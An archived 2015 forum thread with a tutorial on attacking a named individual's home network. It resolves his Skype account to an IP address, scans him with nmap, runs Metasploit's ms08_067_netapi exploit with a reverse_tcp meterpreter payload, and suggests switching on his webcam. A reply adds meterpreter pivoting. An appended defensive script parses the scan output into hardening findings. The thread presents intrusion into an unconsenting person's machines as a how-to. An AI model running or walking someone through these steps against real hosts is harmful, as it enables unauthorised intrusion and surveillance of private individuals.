Author Topic: How to combine Metasploit and Nmap in a charming way

Moon Cat
« on: January 11, 2015, 06:12:42 PM »
Brief Introduction
Some years ago nmap and an exploit database were enough to rule half the internet.
Today barely anyone uses nmap... at all.
All you had to do was to tell a customer you were a 1337 security professional.
Keep in mind that customers only applied patches if it fixed something on the system.
It was common practice not to apply system updates that didn't fix a problem you were experiencing on a system.

Then what you had to do was to scan the customer network with nmap, ISS or Nessus.
Because they didn't add patches and updates there were loads of vulnerabilities on the systems, and from there you break out your 1337 tools and you pwn it all.

Today is way different: you'd never port scan, and there's so much more you have to find your way through, e.g. firewalls, anti-viruses and stuff like that.
Most people would rather go through the web app and look for common vulnerabilities in there such as SQL injection, cross-site scripting, etc.
Today I'm bringing the old days back, and I'm going to teach you how to hack yourself into networks, and make all the boxes yours.

The Interesting part
So, I'm going to assume you already have Linux, Metasploit and Nmap installed.
Let's say your target is John. John has a Skype account which you know of, so what you do is you successfully Skype resolve him and you get his current IP address.
Now open up your Linux terminal and put the following command in:
Code:
nmap -sV
Now, in your case you're obviously going to change the IP address to whatever your target is.
If the host is up you'll hopefully get some ports back that are open.
Code:
Starting Nmap 5.21 ( ) at 2015-01-04 20:05 GMT
Nmap scan report for (
Host is up (0.0017s latency).
Not shown: 994 filtered ports
53/tcp   open   domain     pdnsd
80/tcp   open   tcpwrapped
443/tcp  open   tcpwrapped
445/tcp  open   Microsoft-DS
8000/tcp open   http-alt?
9001/tcp closed tor-orport

Cool. We have a couple of open ports on John's network.
What we need to do is to find the outdated service so we can exploit it. To do this you have to look for the service name in different exploit databases.

For this tutorial I'm using Now I go to the search box and search for Microsoft-DS.
Holy sh-, we got a result:

At this point John's network is not looking good, but it gets better.
For the next step, write the command "msfconsole" and wait a moment.
When it opens up write: use (exploit name). For John here, the exploit name is going to be ms08_067_netapi.
Let's set some stuff and configure the exploit, do this by writing the following command:
Code:
show options
Here we need to set the RHOST (Remote Host), which is John's IP address.
Code:
set rhost
And here we need to set the payload. The payload is basically like a bomb, someone has to carry it inside and blow it up.
I'm going to use a reverse TCP meterpreter shell.
Code:
set payload windows/meterpreter/reverse_tcp
Let's set the LHOST and LPORT, which are my IP address and the port we're going to listen for the meterpreter shell on.
Code:
set lhost (my IP)
Code:
set lport 4444
(Keep in mind that John is outside my network, which means that I have to port forward port 4444.)

Now we're set. Let's exploit this and own John by typing the following command:
Code:
Now you should hopefully have a meterpreter session running, and this works about the same way as netcat does.
That's it, take screenshots, put his webcam on, do whatever; all his boxes are belong to us.

« Last Edit: January 11, 2015, 06:15:27 PM by Moon Cat »
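As an added example (not from the post above nor from Nmap or Metasploit themselves): a small parser for the `nmap -sV` port table the post shows, turned into the list a host owner would want, i.e. which open ports should be filtered or verified. The sample text is the scan output from the post; the `INTERNET_UNSAFE` service list is an assumption made for this example.

```python
import re
from dataclasses import dataclass

# Sample "nmap -sV" normal output, taken from the post above; the URL and target
# IP were already stripped from the archived page, so those header lines stay as-is.
SAMPLE_SCAN = """\
Starting Nmap 5.21 ( ) at 2015-01-04 20:05 GMT
Nmap scan report for (
Host is up (0.0017s latency).
Not shown: 994 filtered ports
53/tcp   open   domain     pdnsd
80/tcp   open   tcpwrapped
443/tcp  open   tcpwrapped
445/tcp  open   Microsoft-DS
8000/tcp open   http-alt?
9001/tcp closed tor-orport
"""

# One port-table line: "<port>/<proto>  <state>  <service>  [<version info>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str  # empty when -sV could not name a product

def parse_nmap_ports(text):
    # Keep only lines that look like port-table rows; headers and summary lines are skipped.
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            entries.append(PortEntry(int(port), proto, state, service, (version or "").strip()))
    return entries

# Assumed list of services that should never be reachable from the internet; SMB (Microsoft-DS)
# is the one the post goes looking for, so it is the first thing to filter at the edge and patch.
INTERNET_UNSAFE = {"microsoft-ds", "netbios-ssn", "msrpc", "ms-wbt-server"}

def exposed_findings(entries):
    # Returns (port, service, recommended action) for every open port that needs attention.
    findings = []
    for e in entries:
        if e.state != "open":
            continue
        if e.service.lower() in INTERNET_UNSAFE:
            findings.append((e.port, e.service, "restrict to LAN/VPN and patch"))
        elif e.service.endswith("?") or e.service == "tcpwrapped":
            findings.append((e.port, e.service, "unidentified service: verify what is listening"))
    return findings
```

Running `exposed_findings(parse_nmap_ports(SAMPLE_SCAN))` on the post's scan flags 445 for filtering and 80, 443 and 8000 as unidentified listeners to inventory.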

n01xxv
Re: How to combine Metasploit and Nmap in a charming way
« Reply #1 on: January 18, 2015, 04:06:04 PM »
All that can be done through metasploit:
Code:

We can add that after having root (or admin, in this Windows OS case) access it is possible to pivot into the network through meterpreter:
Code:

But it's nice to remember that there are not only web-app vulnerabilities in life :)
"Which came first, the bug or the exploit ?"
-- blackngel - Phrack 67 - 0x08
